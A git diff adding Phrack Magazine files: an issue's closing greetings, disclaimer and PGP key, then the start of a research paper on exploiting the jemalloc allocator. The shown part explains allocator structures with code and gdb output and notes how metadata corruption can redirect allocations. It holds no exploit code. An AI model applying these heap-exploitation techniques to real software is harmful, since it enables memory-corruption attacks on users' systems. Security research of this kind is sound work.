+    - scene phile writers:           you have big balls guyz
+    - linenoise writers:             Eva you're soooooooo cute :3
+    - our generous hoster:           a contribution not forgotten ;)
+    - z4ppy, ender:                  external reviews are paid in beers
+    - b3n:                           too bad we didn't use your stuff
+    - No greetz, no thankz to:       you know who you are :<
+
+       And of course many thanks to the loopback contributors :')
+
+
+                  -----( Phrack Magazine's policy )-----
+
+phrack:~# head -n 22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+                  -----( Contact Phrack Magazine )-----
+
+
+            <  Editors           : staff[at]phrack{dot}org   >
+            >  Submissions       : staff[at]phrack{dot}org   <
+            <  Commentary        : loopback[@]phrack{dot}org >
+            >  Phrack World News : pwned[at]phrack{dot}org   <
+
+
+    Submissions may be encrypted with the following PGP key:
+    (Hint: Always use the PGP key from the latest issue)
+
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: PHRACK
+
+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
+=cK7U
+-----END PGP PUBLIC KEY BLOCK-----
+
+                            -----( EOF )-----
diff --git a/phrack68/10.txt b/phrack68/10.txt
new file mode 100644
index 0000000..a4c8010
--- /dev/null
+++ b/phrack68/10.txt
@@ -0,0 +1,10359 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x0a of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
+|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[    argp | huku    ]=------------------------=|
+|=--------------------=[  {argp,huku}@grhack.net  ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+--[ Table of contents
+
+1 - Introduction
+  1.1 - Thousand-faced jemalloc
+2 - jemalloc memory allocator overview
+  2.1 - Basic structures
+    2.1.1 - Chunks (arena_chunk_t)
+    2.1.2 - Arenas (arena_t)
+    2.1.3 - Runs (arena_run_t)
+    2.1.4 - Regions/Allocations
+    2.1.5 - Bins (arena_bin_t)
+    2.1.6 - Huge allocations
+    2.1.7 - Thread caches (tcache_t)
+    2.1.8 - Unmask jemalloc
+  2.2 - Algorithms
+3 - Exploitation tactics
+  3.1 - Adjacent region corruption
+  3.2 - Heap manipulation
+  3.3 - Metadata corruption
+    3.3.1 - Run (arena_run_t)
+    3.3.2 - Chunk (arena_chunk_t)
+    3.3.3 - Thread caches (tcache_t)
+4 - A real vulnerability
+5 - Future work
+6 - Conclusion
+7 - References
+8 - Code
+
+--[ 1 - Introduction
+
+In this paper we investigate the security of the jemalloc allocator
+in both theory and practice. We are particularly interested in the
+exploitation of memory corruption bugs, so our security analysis will
+be biased towards that end.
+
+jemalloc is a userland memory allocator. It provides an implementation
+for the standard malloc(3) interface for dynamic memory management. It
+was written by Jason Evans (hence the 'je') for FreeBSD since there
+was a need for a high performance, SMP-enabled memory allocator for
+libc. After that, jemalloc was also used by the Mozilla Firefox browser
+as its internal dedicated custom memory allocator.
+
+All the above have led to a few versions of jemalloc that are very
+similar but not exactly the same. To summarize, there are three different
+widely used versions of jemalloc: 1) the standalone version [JESA],
+2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
+FreeBSD libc [JEFB] version.
+
+The exploitation vectors we investigate in this paper have been tested
+on the jemalloc versions presented in subsection 1.1, all on the x86
+platform. We assume basic knowledge of x86 and a general familiarity
+with userland malloc() implementations, however these are not strictly
+required.
+
+
+----[ 1.1 - Thousand-faced jemalloc
+
+There are so many different jemalloc versions that we almost went crazy
+double checking everything in all possible platforms. Specifically, we
+tested the latest standalone jemalloc version (2.2.3 at the time of this
+writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
+and the Mozilla Firefox web browser version 11.0. Furthermore, we also
+tested the Linux port of the FreeBSD malloc(3) implementation
+(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
+
+
+--[ 2 - jemalloc memory allocator overview
+
+The goal of this section is to provide a technical overview of the
+jemalloc memory allocator. However, it is not all-inclusive. We will only
+focus on the details that are useful for understanding the exploitation
+attacks against jemalloc analyzed in the next section. The interested
+reader can look in [JE06] for a more academic treatment of jemalloc
+(including benchmarks, comparisons with other allocators, etc).
+
+Before we start our analysis we would like to point out that jemalloc (as
+well as other malloc implementations) does not implement concepts like
+'unlinking' or 'frontlinking' which have proven to be catalytic for the
+exploitation of dlmalloc and Microsoft Windows allocators. That said, we
+would like to stress the fact that the attacks we are going to present do
+not directly achieve a write-4-anywhere primitive. We, instead, focus on
+how to force malloc() (and possibly realloc()) to return a chunk that will
+most likely point to an already initialized memory region, in hope that
+the region in question may hold objects important for the functionality
+of the target application (C++ VPTRs, function pointers, buffer sizes and
+so on). Considering the various anti-exploitation countermeasures present
+in modern operating systems (ASLR, DEP and so on), we believe that such
+an outcome is far more useful for an attacker than a 4 byte overwrite.
+
+jemalloc, as a modern memory allocator should, recognizes that minimal
+page utilization is no longer the most critical feature. Instead it
+focuses on enhanced performance in retrieving data from the RAM. Based
+on the principle of locality which states that items that are allocated
+together are also used together, jemalloc tries to situate allocations
+contiguously in memory. Another fundamental design choice of jemalloc is
+its support for SMP systems and multi-threaded applications by trying
+to avoid lock contention problems between many simultaneously running
+threads. This is achieved by using many 'arenas' and the first time a
+thread calls into the memory allocator (for example by calling malloc(3))
+it is associated with a specific arena. The assignment of threads to
+arenas happens with three possible algorithms: 1) with a simple hashing
+on the thread's ID if TLS is available 2) with a simple builtin linear
+congruential pseudo random number generator in case MALLOC_BALANCE is
+defined and TLS is not available 3) or with the traditional round-robin
+algorithm. For the later two cases, the association between a thread
+and an arena doesn't stay the same for the whole life of the thread.
+
+Continuing our high-level overview of the main jemalloc structures
+before we dive into the details in subsection 2.1, we have the concept of
+'chunks'. jemalloc divides memory into chunks, always of the same size,
+and uses these chunks to store all of its other data structures (and
+user-requested memory as well). Chunks are further divided into 'runs'
+that are responsible for requests/allocations up to certain sizes. A run
+keeps track of free and used 'regions' of these sizes. Regions are the
+heap items returned on user allocations (e.g. malloc(3) calls). Finally,
+each run is associated with a 'bin'. Bins are responsible for storing
+structures (trees) of free regions.
+
+The following diagram illustrates in an abstract manner the relationships
+between the basic building blocks of jemalloc.
+
+  Chunk #0                           Chunk #1
+.--------------------------------. .--------------------------------.
+|                                | |                                |
+|   Run #0         Run #1        | |   Run #0         Run #1        |
+| .-------------..-------------. | | .-------------..-------------. |
+| |             ||             | | | |             ||             | |
+| |   Page      ||   Page      | | | |   Page      ||   Page      | |
+| | .---------. || .---------. | | | | .---------. || .---------. | |
+| | |         | || |         | | | | | |         | || |         | | | ...
+| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
+| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
+| | | ^     ^ | || |         | | | | | | ^     ^ | || |         | | |
+| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
+| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
+`-----|-----|--------------------' `-----|-----|--------------------'
+      |     |                            |     |
+      |     |                            |     |
+  .---|-----|----------.             .---|-----|----------.
+  |   |     |          |             |   |     |          |
+  | free regions' tree | ...         | free regions' tree | ...
+  |                    |             |                    |
+  `--------------------'             `--------------------'
+  bin[Chunk #0][Run #0]              bin[Chunk #1][Run #0]
+
+
+----[ 2.1 - Basic structures
+
+In the following paragraphs we analyze in detail the basic jemalloc
+structures. Familiarity with these structures is essential in order to
+begin our understanding of the jemalloc internals and proceed to the
+exploitation step.
+
+
+------[ 2.1.1 - Chunks (arena_chunk_t)
+
+If you are familiar with Linux heap exploitation (and more precisely with
+dlmalloc internals) you have probably heard of the term 'chunk' before. In
+dlmalloc, the term 'chunk' is used to denote the memory regions returned
+by malloc(3) to the end user. We hope you get over it soon because when it
+comes to jemalloc the term 'chunk' is used to describe big virtual memory
+regions that the memory allocator conceptually divides available memory
+into. The size of the chunk regions may vary depending on the jemalloc
+variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
+(aligned to its size), while on the latest FreeBSD (in CVS at the time of
+this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
+highest abstraction used in jemalloc's design, that is the rest of the
+structures described in the following paragraphs are actually placed within
+a chunk somewhere in the target's memory.
+
+The following are the chunk sizes in the jemalloc variants we have
+examined:
+
+                +---------------------------------------+
+                | jemalloc variant         | Chunk size |
+                +---------------------------------------+
+                | FreeBSD 8.2-RELEASE      |    1 MB    |
+                -----------------------------------------
+                | Standalone v2.2.3        |    4 MB    |
+                -----------------------------------------
+                | jemalloc_linux_20080828a |    1 MB    |
+                -----------------------------------------
+                | Mozilla Firefox v5.0     |    1 MB    |
+                -----------------------------------------
+                | Mozilla Firefox v7.0.1   |    1 MB    |
+                -----------------------------------------
+                | Mozilla Firefox v11.0    |    1 MB    |
+                -----------------------------------------
+
+An area of jemalloc managed memory divided into chunks looks like the
+following diagram. We assume a chunk size of 4 MB; remember that chunks are
+aligned to their size. The address 0xb7000000 does not have a particular
+significance apart from illustrating the offsets between each chunk.
+
++-------------------------------------------------------------------------+
+|         Chunk alignment        |             Chunk content              |
++-------------------------------------------------------------------------+
+| Chunk #1 starts at: 0xb7000000 [  Arena                                 ]
+| Chunk #2 starts at: 0xb7400000 [  Arena                                 ]
+| Chunk #3 starts at: 0xb7800000 [  Arena                                 ]
+| Chunk #4 starts at: 0xb7c00000 [  Arena                                 ]
+| Chunk #5 starts at: 0xb8000000 [  Huge allocation region, see below     ]
+| Chunk #6 starts at: 0xb8400000 [  Arena                                 ]
+| Chunk #7 starts at: 0xb8800000 [  Huge allocation region                ]
+| Chunk #8 starts at: 0xb8c00000 [  Huge allocation region                ]
+| Chunk #9 starts at: 0xb9000000 [  Arena                                 ]
++-------------------------------------------------------------------------+
+
+Huge allocation regions are memory regions managed by jemalloc chunks that 
+satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc 
+also has the small/medium and large size classes for end user allocations 
+(both managed by arenas). We analyze jemalloc's size classes of regions in 
+subsection 2.1.4.
+
+Chunks are described by 'arena_chunk_t' structures (taken from the
+standalone version of jemalloc; we have added and removed comments in
+order to make things more clear):
+
+
+[2-1]
+
+typedef struct arena_chunk_s arena_chunk_t;
+struct arena_chunk_s
+{
+    /* The arena that owns this chunk. */
+    arena_t *arena;
+
+    /* A list of the corresponding arena's dirty chunks. */
+    ql_elm(arena_chunk_t) link_dirty;
+
+    /* 
+     * Whether this chunk contained at some point one or more dirty pages.
+     */
+    bool dirtied;
+
+    /* This chunk's number of dirty pages. */
+    size_t ndirty;
+
+    /*
+     * A chunk map element corresponds to a page of this chunk. The map
+     * keeps track of free and large/small regions.
+     */
+    arena_chunk_map_t map[];
+};
+
+
+The main use of chunk maps in combination with the memory alignment of the
+chunks is to enable constant time access to the management metadata of free
+and large/small heap allocations (regions).
+
+
+------[ 2.1.2 - Arenas (arena_t)
+
+An arena is a structure that manages the memory areas jemalloc divides
+into chunks. Arenas can span more than one chunk, and depending on the
+size of the chunks, more than one page as well. As we have already
+mentioned, arenas are used to mitigate lock contention problems between
+threads. Therefore, allocations and deallocations from a thread always
+happen on the same arena. Theoretically, the number of arenas is in direct
+relation to the need for concurrency in memory allocation. In practice the
+number of arenas depends on the jemalloc variant we deal with. For example,
+in Firefox's jemalloc there is only one arena. In the case of single-CPU
+systems there is also only one arena. In SMP systems the number of arenas
+is equal to either two (in FreeBSD 8.2) or four (in the standalone variant)
+times the number of available CPU cores. Of course, there is always at
+least one arena.
+
+Debugging the standalone variant with gdb:
+
+
+gdb $ print ncpus
+$86 = 0x4
+gdb $ print narenas
+$87 = 0x10
+
+
+Arenas are the central jemalloc data structures as they are used to manage
+the chunks (and the underlying pages) that are responsible for the small
+and large allocation size classes. Specifically, the arena structure is
+defined as follows:
+
+
+[2-2]
+
+typedef struct arena_s arena_t;
+struct arena_s
+{
+    /* This arena's index in the arenas array. */
+    unsigned ind;
+
+    /* Number of threads assigned to this arena. */
+    unsigned nthreads;
+
+    /* Mutex to protect certain operations. */
+    malloc_mutex_t lock;
+
+    /*
+     * Chunks that contain dirty pages managed by this arena. When jemalloc
+     * requires new pages these are allocated first from the dirty pages.
+     */
+    ql_head(arena_chunk_t) chunks_dirty;
+
+    /*
+     * Each arena has a spare chunk in order to cache the most recently
+     * freed chunk.
+     */
+    arena_chunk_t *spare;
+
+    /* The number of pages in this arena's active runs. */
+    size_t nactive;
+
+    /* The number of pages in unused runs that are potentially dirty. */
+    size_t ndirty;
+
+    /* The number of pages this arena's threads are attempting to purge. */
+    size_t npurgatory;
+
+    /* 
+     * Ordered tree of this arena's available clean runs, i.e. runs
+     * associated with clean pages.
+     */
+    arena_avail_tree_t runs_avail_clean;
+
+    /*
+     * Ordered tree of this arena's available dirty runs, i.e. runs
+     * associated with dirty pages.
+     */
+    arena_avail_tree_t runs_avail_dirty;
+
+    /* 
+     * Bins are used to store structures of free regions managed by this
+     * arena.
+     */
+    arena_bin_t bins[];
+};
+
+
+All in all a fairly simple structure. As it is clear from the above
+structure, the allocator contains a global array of arenas and an unsigned
+integer representing the number of these arenas:
+
+
+arena_t     **arenas;
+unsigned    narenas;
+
+
+And using gdb we can see the following:
+
+
+gdb $ x/x arenas
+0xb7800cc0: 0xb7800740
+gdb $ print arenas[0]
+$4 = (arena_t *) 0xb7800740
+gdb $ x/x &narenas
+0xb7fdfdc4 <narenas>:   0x00000010
+
+
+At 0xb7800740 we have 'arenas[0]', that is the first arena, and at
+0xb7fdfdc4 we have the number of arenas, i.e 16.
+
+
+------[ 2.1.3 - Runs (arena_run_t)
+
+Runs are further memory denominations of the memory divided by jemalloc
+into chunks. Runs exist only for small and large allocations (see
+subsection 2.1.1), but not for huge allocations. In essence, a chunk
+is broken into several runs. Each run is actually a set of one or more
+contiguous pages (but a run cannot be smaller than one page). Therefore,
+they are aligned to multiples of the page size. The runs themselves may
+be non-contiguous but they are as close as possible due to the tree search
+heuristics implemented by jemalloc.
+
+The main responsibility of a run is to keep track of the state (i.e. free
+or used) of end user memory allocations, or regions as these are called in
+jemalloc terminology. Each run holds regions of a specific size (however
+within the small and large size classes as we have mentioned) and their
+state is tracked with a bitmask. This bitmask is part of a run's metadata;
+these metadata are defined with the following structure:
+
+
+[2-3]
+
+typedef struct arena_run_s arena_run_t;
+struct arena_run_s
+{
+    /*
+     * The bin that this run is associated with. See 2.1.5 for details on
+     * the bin structures.
+     */
+    arena_bin_t *bin;
+    
+    /*
+     * The index of the next region of the run that is free. On the FreeBSD
+     * and Firefox flavors of jemalloc this variable is named regs_minelm.
+     */
+    uint32_t nextind;
+    
+    /* The number of free regions in the run. */
+    unsigned nfree;
+
+    /*
+     * Bitmask for the regions in this run. Each bit corresponds to one
+     * region. A 0 means the region is used, and an 1 bit value that the
+     * corresponding region is free. The variable nextind (or regs_minelm
+     * on FreeBSD and Firefox) is the index of the first non-zero element
+     * of this array.
+     */
+    unsigned regs_mask[];
+};
+
+
+Don't forget to re-read the comments ;)
+
+
+------[ 2.1.4 - Regions/Allocations
+
+In jemalloc the term 'regions' applies to the end user memory areas
+returned by malloc(3). As we have briefly mentioned earlier, regions are
+divided into three classes according to their size, namely a) small/medium,
+b) large and c) huge.
+
+Huge regions are considered those that are bigger than the chunk size minus
+the size of some jemalloc headers. For example, in the case that the chunk
+size is 4 MB (4096 KB) then a huge region is an allocation greater than
+4078 KB. Small/medium are the regions that are smaller than a page. Large
+are the regions that are smaller than the huge regions (chunk size minus
+some headers) and also larger than the small/medium regions (page size).
+
+Huge regions have their own metadata and are managed separately from
+small/medium and large regions. Specifically, they are managed by a
+global to the allocator red-black tree and they have their own dedicated
+and contiguous chunks. Large regions have their own runs, that is each
+large allocation has a dedicated run. Their metadata are situated on
+the corresponding arena chunk header. Small/medium regions are placed
+on different runs according to their specific size. As we have seen in
+2.1.3, each run has its own header in which there is a bitmask array
+specifying the free and the used regions in the run.
+
+In the standalone flavor of jemalloc the smallest run is that for regions
+of size 4 bytes. The next run is for regions of size 8 bytes, the next
+for 16 bytes, and so on.
+
+When we do not mention it specifically, we deal with small/medium and
+large region classes. We investigate the huge region size class separately
+in subsection 2.1.6.
+
+
+------[ 2.1.5 - Bins (arena_bin_t)
+
+Bins are used by jemalloc to store free regions. Bins organize the free
+regions via runs and also keep metadata about their regions, like for
+example the size class, the total number of regions, etc. A specific bin 
+may be associated with several runs, however a specific run can only be
+associated with a specific bin, i.e. there is an one-to-many correspondence
+between bins and runs. Bins have their associated runs organized in a tree.
+
+Each bin has an associated size class and stores/manages regions of this
+size class. A bin's regions are managed and accessed through the bin's
+runs. Each bin has a member element representing the most recently used run
+of the bin, called 'current run' with the variable name runcur. A bin also
+has a tree of runs with available/free regions. This tree is used when the
+current run of the bin is full, that is it doesn't have any free regions.
+
+A bin structure is defined as follows:
+
+
+[2-4]
+
+typedef struct arena_bin_s arena_bin_t;
+struct arena_bin_s
+{
+    /*
+     * Operations on the runs (including the current run) of the bin
+     * are protected via this mutex.
+     */
+    malloc_mutex_t lock;
+
+    /*
+     * The current run of the bin that manages regions of this bin's size
+     * class.
+     */
+    arena_run_t *runcur;
+
+    /*
+     * The tree of the bin's associated runs (all responsible for regions
+     * of this bin's size class of course).
+     */
+    arena_run_tree_t runs;
+
+    /* The size of this bin's regions. */
+    size_t reg_size;
+    
+    /*
+     * The total size of a run of this bin. Remember that each run may be
+     * comprised of more than one pages.
+     */
+    size_t run_size;
+    
+    /* The total number of regions in a run of this bin. */
+    uint32_t nregs;
+    
+    /*
+     * The total number of elements in the regs_mask array of a run of this
+     * bin. See 2.1.3 for more information on regs_mask.
+     */
+    uint32_t regs_mask_nelms;
+    
+    /*
+     * The offset of the first region in a run of this bin. This can be 
+     * non-zero due to alignment requirements.
+     */
+    uint32_t reg0_offset;
+};
+
+
+As an example, consider the following three allocations and that the
+jemalloc flavor under investigation has 2 bytes as the smallest possible
+allocation size (file test-bins.c in the code archive, example run on
+FreeBSD):
+
+
+one = malloc(2);
+two = malloc(8);
+three = malloc(16);
+
+
+Using gdb let's explore jemalloc's structures. First let's see the runs
+that the above allocations created in their corresponding bins:
+
+
+gdb $ print arenas[0].bins[0].runcur
+$25 = (arena_run_t *) 0xb7d01000
+gdb $ print arenas[0].bins[1].runcur
+$26 = (arena_run_t *) 0x0
+gdb $ print arenas[0].bins[2].runcur
+$27 = (arena_run_t *) 0xb7d02000
+gdb $ print arenas[0].bins[3].runcur
+$28 = (arena_run_t *) 0xb7d03000
+gdb $ print arenas[0].bins[4].runcur
+$29 = (arena_run_t *) 0x0
+
+
+Now let's see the size classes of these bins:
+
+
+gdb $ print arenas[0].bins[0].reg_size
+$30 = 0x2
+gdb $ print arenas[0].bins[1].reg_size
+$31 = 0x4
+gdb $ print arenas[0].bins[2].reg_size
+$32 = 0x8
+gdb $ print arenas[0].bins[3].reg_size
+$33 = 0x10
+gdb $ print arenas[0].bins[4].reg_size
+$34 = 0x20
+
+
+We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
+in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
+is responsible for the size class 2 and its current run is at 0xb7d01000,
+'bin[1]' is responsible for the size class 4 and doesn't have a current
+run since no allocations of size 4 were made, 'bin[2]' is responsible
+for the size class 8 with its current run at 0xb7d02000, and so on. In the
+code archive you can find a Python script for gdb named unmask_jemalloc.py
+for easily enumerating the size of bins and other internal information in
+the various jemalloc flavors (see 2.1.8 for a sample run).
+
+At this point we should mention that in jemalloc an allocation of zero
+bytes (that is a malloc(0) call) will return a region of the smallest size
+class; in the above example a region of size 2. The smallest size class
+depends on the flavor of jemalloc. For example, in the standalone flavor it
+is 4 bytes.
+
+The following diagram summarizes our analysis of jemalloc up to this point:
+
+   .----------------------------------.       .---------------------------.
+ .----------------------------------. |    +--+-----> arena_chunk_t       |
+.---------------------------------. | |    |  |                           |
+|             arena_t             | | |    |  |  .---------------------.  |
+|                                 | | |    |  |  |                     |  |
+| .--------------------.          | | |    |  |  |     arena_run_t     |  |
+| | arena_chunk_t list |-----+    | | |    |  |  |                     |  |
+| `--------------------'     |    | | |    |  |  |    .-----------.    |  |
+|                            |    | | |    |  |  |    |   page    |    |  |
+|   arena_bin_t bins[];      |    | | |    |  |  |    +-----------+    |  |
+| .------------------------. |    | | |    |  |  |    |  region   |    |  |
+| | bins[0]  ...  bins[27] | |    | | |    |  |  |    +-----------+    |  |
+| `------------------------' |    | |.'    |  |  |    |  region   |    |  |
+|     |                      |    |.'      |  |  |    +-----------+    |  |
+`-----+----------------------+----'        |  |  |    |  region   |    |  |
+      |                      |             |  |  |    +-----------+    |  |
+      |                      |             |  |  |        . . .        |  |
+      |                      v             |  |  |    .-----------.    |  |
+      |            .-------------------.   |  |  |    |   page    |    |  |
+      |            | .---------------. |   |  |  |    +-----------+    |  |
+      |            | | arena_chunk_t |-+---+  |  |    |  region   |    |  |
+      |            | `---------------' |      |  |    +-----------+    |  |
+      |     [2-5]  | .---------------. |      |  |    |  region   |    |  |
+      |            | | arena_chunk_t | |      |  |    +-----------+    |  |
+      |            | `---------------' |      |  |    |  region   |    |  |
+      |            |       . . .       |      |  |    +-----------+    |  |
+      |            | .---------------. |      |  |                     |  |
+      |            | | arena_chunk_t | |      |  `---------------------'  |
+      |            | `---------------' |      |          [2-6]            |
+      |            |       . . .       |      |  .---------------------.  |
+      |            `-------------------'      |  |                     |  |
+      |                                  +----+--+---> arena_run_t     |  |
+      |                                  |    |  |                     |  |
+      +----------+                       |    |  |    .-----------.    |  |
+                 |                       |    |  |    |   page    |    |  |
+                 |                       |    |  |    +-----------+    |  |
+                 |                       |    |  |    |  region   |    |  |
+                 v                       |    |  |    +-----------+    |  |
+    .--------------------------.         |    |  |    |  region   |    |  |
+    |       arena_bin_t        |         |    |  |    +-----------+    |  |
+    |     bins[0] (size 8)     |         |    |  |    |  region   |    |  |
+    |                          |         |    |  |    +-----------+    |  |
+    | .----------------------. |         |    |  |        . . .        |  |
+    | | arena_run_t *runcur; |-+---------+    |  |    .-----------.    |  |
+    | `----------------------' |              |  |    |   page    |    |  |
+    `--------------------------'              |  |    +-----------+    |  |
+                                              |  |    |  region   |    |  |
+                                              |  |    +-----------+    |  |
+                                              |  |    |  region   |    |  |
+                                              |  |    +-----------+    |  |
+                                              |  |    |  region   |    |  |
+                                              |  |    +-----------+    |  |
+                                              |  |                     |  |
+                                              |  `---------------------'  |
+                                              `---------------------------'
+
+
+------[ 2.1.6 - Huge allocations
+
+Huge allocations are not very interesting for the attacker but they are an
+integral part of jemalloc which may affect the exploitation process. Simply
+put, huge allocations are represented by 'extent_node_t' structures that 
+are ordered in a global red black tree which is common to all threads.
+
+
+[2-7]
+
+/* Tree of extents. */
+typedef struct extent_node_s extent_node_t;
+struct extent_node_s {
+    #ifdef MALLOC_DSS
+        /* Linkage for the size/address-ordered tree. */
+        rb_node(extent_node_t) link_szad;
+    #endif
+
+    /* Linkage for the address-ordered tree. */
+    rb_node(extent_node_t) link_ad;
+
+    /* Pointer to the extent that this tree node is responsible for. */
+    void *addr;
+
+    /* Total region size. */
+    size_t size;
+};
+typedef rb_tree(extent_node_t) extent_tree_t;
+
+
+The 'extent_node_t' structures are allocated in small memory regions
+called base nodes. Base nodes do not affect the layout of end user heap
+allocations since they are served either by the DSS or by individual
+memory mappings acquired by 'mmap()'. The actual method used to allocate
+free space depends on how jemalloc was compiled with 'mmap()' being
+the default.
+
+
+/* Allocate an extent node with which to track the chunk. */
+node = base_node_alloc();
+...
+
+ret = chunk_alloc(csize, zero);
+...
+
+/* Insert node into huge. */
+node->addr = ret;
+node->size = csize;
+...
+
+malloc_mutex_lock(&huge_mtx);
+extent_tree_ad_insert(&huge, node);
+
+
+The most interesting thing about huge allocations is the fact that free
+base nodes are kept in a simple array of pointers called 'base_nodes'. The
+aforementioned array, although defined as a simple pointer, it's handled
+as if it was a two dimensional array holding pointers to available base
+nodes.
+
+
+static extent_node_t *base_nodes;
+...
+
+static extent_node_t *
+base_node_alloc(void)
+{
+    extent_node_t *ret;
+
+    malloc_mutex_lock(&base_mtx);
+    if (base_nodes != NULL) {
+        ret = base_nodes;
+        base_nodes = *(extent_node_t **)ret;
+        ...
+    }
+    ...
+}
+
+static void
+base_node_dealloc(extent_node_t *node)
+{
+    malloc_mutex_lock(&base_mtx);
+    *(extent_node_t **)node = base_nodes;
+    base_nodes = node;
+    ...
+}
+
+
+Taking into account how 'base_node_alloc()' works, it's obvious that if
+an attacker corrupts the pages that contain the base node pointers, she
+can force jemalloc to use an arbitrary address as a base node pointer. This
